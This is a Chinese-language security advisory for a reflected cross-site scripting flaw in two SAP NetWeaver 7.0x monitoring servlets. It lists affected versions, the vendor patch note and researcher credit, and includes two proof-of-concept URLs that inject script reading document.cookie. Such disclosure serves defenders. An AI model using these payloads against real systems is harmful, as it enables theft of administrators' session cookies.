漏洞起因
输入验证错误
危险等级
低
影响系统
SAP NetWeaver 7.02
SAP NetWeaver 7.01
SAP NetWeaver 7.0
不受影响系统
危害
远程攻击者可以利用漏洞获得目标用户敏感信息。
攻击所需条件
攻击者必须构建恶意链接,诱使用户解析。
漏洞信息
SAP NetWeaver是一款SAP业务套件解决方案、SAP xApps组合应用、合作伙伴解决方案以及客户定制应用的技术基础。
SAP NetWeaver中包含的ConnectionMonitorServlet和CatalogBufferMonitorServlet脚本对connid及reqTableColumns参数缺少充分过滤,攻击者可以发送链接给管理员获得COOKIE等敏感信息。
测试方法
http://172.16.0.222:50100/OpenSQLMonitors/servlet/ConnectionMonitorServlet?view=stmtpool&node=12924950&ds=SAPSR3DB&connid
=com.sap.sql.jdbc.direct.DirectPooledConnection@1ed00a7<script>alert(document.cookie)</script>
http://172.16.0.222:50100/OpenSQLMonitors/servlet/CatalogBufferMonitorServlet?action=btnSHOW_COLUMNS&reqNode=12924950&reqBufferId=
SAPSERVER:dm0:SAPSR3DB&reqTableColumns=BC_RPROF_PROFILE<script>alert(document.cookie)</script>
厂商解决方案
用户可参考如下供应商提供的安全公告获得补丁信息:
https://service.sap.com/sap/support/notes/1391770
漏洞提供者
a.polyakov and a.troshichev from Digital Security Research Group
0 条评论。